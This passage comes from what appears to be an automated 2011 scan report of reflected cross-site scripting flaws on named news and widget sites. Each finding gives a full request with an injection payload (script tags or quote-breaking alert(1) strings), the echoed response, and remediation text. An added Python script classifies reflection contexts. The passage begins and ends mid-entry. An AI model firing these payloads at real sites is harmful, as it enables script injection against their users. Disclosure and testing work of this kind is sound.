Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:02 GMT
Server: Apache
X-Host: w12
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Mon, 09 May 2011 16:38:02 GMT
Content-Type: text/javascript
Content-Length: 61867

/*
   Player TYPE 2
   DayPort, Inc.
*/
DayPortPlayerCallBack.DayPortPlayer_018a4c(a)2aba04c4501.embed = function()
{
   this.version = "201001251308";
   
   this.imageDomain = "wvue.img.entriq.net";
   this.domain = "wvue.web.entriq.net";
   this.noCacheDomain = "wvue.web.entriq.net";
   
   this.affiliateID
...[SNIP]...
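
The context labels used in the issue details above (plain text between tags, double-quoted attribute value, double- or single-quoted JavaScript string, unquoted JavaScript expression) can be re-derived from a response body and the probe that was sent. The following is an added example written for this page, not code from XSS.CX or from Burp Suite. Its sample bodies are constructed, abridged copies of the responses shown in 2.111, 2.121, 2.122 and 2.123; the single-quoted sample is invented because the response for 2.128 is not reproduced here; and the classify_reflection and run_samples names are the example's own.

```python
"""Classify the context a reflected probe lands in.  Added example for
this page, not code from XSS.CX or Burp Suite."""
import html

JS_TYPES = {"text/javascript", "application/javascript", "application/x-javascript"}
JS_STRING = {'"': "js string (double-quoted)", "'": "js string (single-quoted)",
             "`": "js template literal"}
HTML_ATTR = {'"': "html attribute value (double-quoted)",
             "'": "html attribute value (single-quoted)"}


def _js_quote_state(src):
    """Return the string delimiter still open at the end of src, or None.
    Comments are skipped so an apostrophe in one is not an open string."""
    quote, i, n = None, 0, len(src)
    while i < n:
        c = src[i]
        if quote:
            if c == "\\":            # escaped character inside a string
                i += 2
                continue
            if c == quote:
                quote = None
        elif src.startswith("//", i):
            nl = src.find("\n", i)
            i = n if nl == -1 else nl
            continue
        elif src.startswith("/*", i):
            end = src.find("*/", i + 2)
            i = n if end == -1 else end + 2
            continue
        elif c in "\"'`":
            quote = c
        i += 1
    return quote


def _html_attr_state(tag_prefix):
    """Return the attribute quote still open inside a start tag, or None."""
    quote = None
    for c in tag_prefix:
        if quote:
            if c == quote:
                quote = None
        elif c in "\"'":
            quote = c
    return quote


def classify_reflection(body, payload, content_type="text/html"):
    """Find payload in body and name the syntactic context it sits in.

    Returns {"echoed": bool, "modified": bool, "context": str}.  HTML
    comments and CDATA sections are not modelled.
    """
    idx = body.find(payload)
    if idx == -1:                     # not verbatim: encoded on output?
        encoded = html.escape(payload, quote=True) in body
        return {"echoed": encoded, "modified": True,
                "context": "html-encoded" if encoded else "absent"}
    prefix = body[:idx]
    script = None
    if content_type.split(";")[0].strip().lower() in JS_TYPES:
        script = prefix               # the whole response is script
    else:
        low = prefix.lower()
        open_tag, close_tag = low.rfind("<script"), low.rfind("</script")
        if open_tag > close_tag:      # an unclosed <script> precedes us
            gt = prefix.find(">", open_tag)
            if gt != -1:              # ...and we are past its start tag
                script = prefix[gt + 1:]
    if script is not None:
        context = JS_STRING.get(_js_quote_state(script), "js expression (unquoted)")
    elif prefix.rfind("<") > prefix.rfind(">"):   # inside a start tag
        context = HTML_ATTR.get(_html_attr_state(prefix[prefix.rfind("<"):]),
                                "html tag (unquoted)")
    else:
        context = "html text (between tags)"
    return {"echoed": True, "modified": False, "context": context}


# Constructed, abridged copies of responses shown in this report, plus two
# invented cases (a single-quoted JS string and an HTML-encoded echo).
SAMPLES = {
    "2.111": ("<H1>404 Not Found</H1>\n<pre>Resource /servlet/ajrotator204c1"
              "<script>alert(1)</script>890dbe70db7/541/0/vj not found</pre>\n",
              "204c1<script>alert(1)</script>890dbe70db7", "text/html"),
    "2.121": ("/*\n   Player TYPE 2\n   DayPort, Inc.\n*/\nDayPortPlayerCallBack."
              "DayPortPlayer_018a4c(a)2aba04c4501.embed = function()\n{\n",
              "18a4c(a)2aba04c4501", "text/javascript"),
    "2.122": ('<html><head><script src="/js/dojo/dojo/dojo.js"></script></head>\n'
              '<body>\n<input type="hidden" name="id" value="1282808868879">'
              '<script>alert(1)</script>7a0fb199d01">\n',
              '68879"><script>alert(1)</script>7a0fb199d01', "text/html"),
    "2.123": ('<html><head><title> Not Found</title>\n<script language="JavaScript"'
              ' type="text/javascript">\n    s.pageName="/Businesse3b56"-alert(1)-'
              '"5f879a42391";\n    var s_code=s.t();\n</script>\n',
              'e3b56"-alert(1)-"5f879a42391', "text/html"),
    "single": ("<script>var wid='225ed'-alert(1)-'5d65b809296';</script>",
               "225ed'-alert(1)-'5d65b809296", "text/html"),
    "encoded": ("<pre>Resource " + html.escape("x<script>alert(1)</script>y")
                + " not found</pre>", "x<script>alert(1)</script>y", "text/html"),
}


def run_samples():
    """Classify every sample; returns {label: context}."""
    return {label: classify_reflection(body, probe, ctype)["context"]
            for label, (body, probe, ctype) in SAMPLES.items()}


if __name__ == "__main__":
    for label, context in run_samples().items():
        print(f"{label:8s} {context}")
```

The content type matters as much as the markup: for 2.121 the whole body is script, so there is no script element to look for, and a checker that only scans for tags would label that reflection as plain text.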

2.122. http://www.collegesurfing.com/searchbox-mge-us.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /searchbox-mge-us.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68879"><script>alert(1)</script>7a0fb199d01 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchbox-mge-us.php?id=1282808868879"><script>alert(1)</script>7a0fb199d01&type=MGEUSDEST&style=&affiliatesearchboxid=7851&program_type= HTTP/1.1
Host: www.collegesurfing.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; PHPSESSID=3eicgiuhi2dvuo76dhkvncnek6; AFF_ID=6; AFF_URL=http%3A%2F%2Fwww.collegesurfing.com%2Fsearchbox-mge-us.php%3Fid%3D12828088%26type%3DMGEUSDEST%26style%3D%26affiliatesearchboxid%3D7851%26program_type%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11482

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/css/searchbox-mge-us.css" rel="stylesheet" type="text/css" />
   <script src="/js/dojo/dojo/dojo.js"></script>
</head>
<body>
<sc
...[SNIP]...
<input type="hidden" name="id" value="1282808868879"><script>alert(1)</script>7a0fb199d01">
...[SNIP]...

2.123. http://www.csmonitor.com/Business [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3b56"-alert(1)-"5f879a42391 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The probe needs neither a semicolon nor a comment: the first double quote closes the s.pageName string, -alert(1)- turns the statement into an arithmetic expression whose evaluation calls alert, and the second quote reopens a string that the template's own closing quote terminates. Entries 2.124 through 2.127 are this same sink, the SiteCatalyst pageName line of the eZ Publish not-found page, reached through other path segments. The 404 response is also marked Cache-Control: public with a max-age of about one day, so shared caches may retain the injected page for that URL.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Businesse3b56"-alert(1)-"5f879a42391 HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; s_cc=true; s_nr=1304955268151-New; c_m=undefinedburpburp; rvd=1304955268153%3E0%3A1; rvd_s=1; s_depth=4; s_lv=1304955268156; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843268157%26vn%3D1; s_monthinvisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:35:00 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86376
Expires: Tue, 10 May 2011 15:34:37 GMT
Date: Mon, 09 May 2011 15:35:01 GMT
Connection: close
Content-Length: 31494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Businesse3b56"-alert(1)-"5f879a42391";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.124. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b75d3"-alert(1)-"e5051c0c7b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Businessb75d3"-alert(1)-"e5051c0c7b7/2011/0509/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:08 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:38:08 GMT
Date: Mon, 09 May 2011 15:38:08 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Businessb75d3"-alert(1)-"e5051c0c7b7/2011/0509/Gas-prices-start-to-head-down";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.125. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4befc"-alert(1)-"229bb0a2d73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Business/20114befc"-alert(1)-"229bb0a2d73/0509/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:13 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86399
Expires: Tue, 10 May 2011 15:38:12 GMT
Date: Mon, 09 May 2011 15:38:13 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Business/20114befc"-alert(1)-"229bb0a2d73/0509/Gas-prices-start-to-head-down";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.126. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48666"-alert(1)-"a40ab4b1207 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Business/2011/050948666"-alert(1)-"a40ab4b1207/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:17 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86397
Expires: Tue, 10 May 2011 15:38:14 GMT
Date: Mon, 09 May 2011 15:38:17 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Business/2011/050948666"-alert(1)-"a40ab4b1207/Gas-prices-start-to-head-down";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.127. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f5a"-alert(1)-"1903108f0c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Business/2011/0509/Gas-prices-start-to-head-down81f5a"-alert(1)-"1903108f0c0 HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:22 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:38:22 GMT
Date: Mon, 09 May 2011 15:38:22 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Business/2011/0509/Gas-prices-start-to-head-down81f5a"-alert(1)-"1903108f0c0";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.128. http://www.fox8live.com/widgets/serve.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /widgets/serve.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 225ed'-alert(1)-'5d65b809296 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/serve.aspx?wid=b9fd9b2c-4752-4433-8ab5-6a62e33475f4&ver=1&225ed'-alert(1)-'5d65b809296=1 HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:06 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n27), ms iad-agg-n27 ( origin)
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:42:07 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 9234
Connection: keep-alive
Content-Length: 9234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1">
...[SNIP]...
) && (IDMUtilsJS_Loaded)) {
Goto(searchval);
}
}
function Goto(searchval) {
var sFormat = 'click.ashx?type=business&name={0}&address=New Orleans, LA&wid=b9fd9b2c-4752-4433-8ab5-6a62e33475f4&ver=1&225ed'-alert(1)-'5d65b809296=1';
var sSubmitTarget = String.format(sFormat, searchval);
window.open(sSubmitTarget, "wSILSearch");
}

</script>
...[SNIP]...

2.129. http://www.macroaxis.com/widgets/url.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbb11"-alert(1)-"0ecdb942be3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC&cbb11"-alert(1)-"0ecdb942be3=1 HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=6B4341DCEBE25EE8018BA77B7EEF7E70; Path=/
Content-Length: 2480
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
y_frame' marginheight='0' marginwidth='0' SCROLLING='NO' height='174px' width='100%' frameborder='0' src='http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC&cbb11"-alert(1)-"0ecdb942be3=1'>
...[SNIP]...

2.130. http://www.macroaxis.com/widgets/url.jsp [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171ae"-alert(1)-"dbac3ee73b3 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC171ae"-alert(1)-"dbac3ee73b3 HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=86336010BD34783C481AC7B25384C4BA; Path=/
Content-Length: 2477
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
ay_frame' marginheight='0' marginwidth='0' SCROLLING='NO' height='174px' width='100%' frameborder='0' src='http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC171ae"-alert(1)-"dbac3ee73b3'>
...[SNIP]...

2.131. http://www.macroaxis.com/widgets/url.jsp [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb33'%3balert(1)//711c8836387 was submitted in the t parameter. This input was echoed as 6fb33';alert(1)//711c8836387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=266fb33'%3balert(1)//711c8836387&s=NYA,IXIC,GSPC HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

